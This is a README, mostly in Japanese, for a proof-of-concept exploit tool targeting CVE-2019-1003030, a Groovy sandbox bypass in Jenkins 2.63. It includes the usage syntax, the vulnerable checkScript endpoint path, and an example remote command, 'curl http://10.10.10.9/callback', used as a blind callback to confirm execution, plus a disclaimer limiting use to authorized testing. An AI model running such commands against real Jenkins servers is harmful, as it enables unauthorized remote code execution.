
jenkins 2.63 向け CVE-2019-1003030 の PoC
このプロジェクトは、Jenkins 2.63 で使用される Jenkins SecureGroovyScript 検証エンドポイントへの Groovy ペイロードの作成と配信を自動化します。 このツールはインタラクティブモードとワンショット実行の両方をサポートします。エクスプロイトは出力を返さないため、正常に動作していることを確認するために、独自のAPにcurlを実行するなどの検証が必要です。
このツールは以下をサポートします:
免責事項
このプロジェクトはセキュリティ研究、CTF、ラボ環境、許可されたペネトレーションテスト専用です。明確な許可なしにシステムに対して使用しないでください。
usage: Poc.py -u http://10.10.10.10:8080/ [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
PoC for sandbox bypass for jenkins 2.63
options:
-h, --help show this help message and exit
-u, --url URL ip of target
-X, --method METHOD post or get
-b, --breadcrum BREADCRUM
optional jenkins crumb string
-c, --command COMMAND
command to run on jenkins, not output expected
-p, --path PATH path to the script, you might prepend more
-c オプションを省略するとインタラクティブプロンプトが起動します。以下の例の通り、残念ながら出力はありません。404 が返らなければ正常に動作しているはずです。
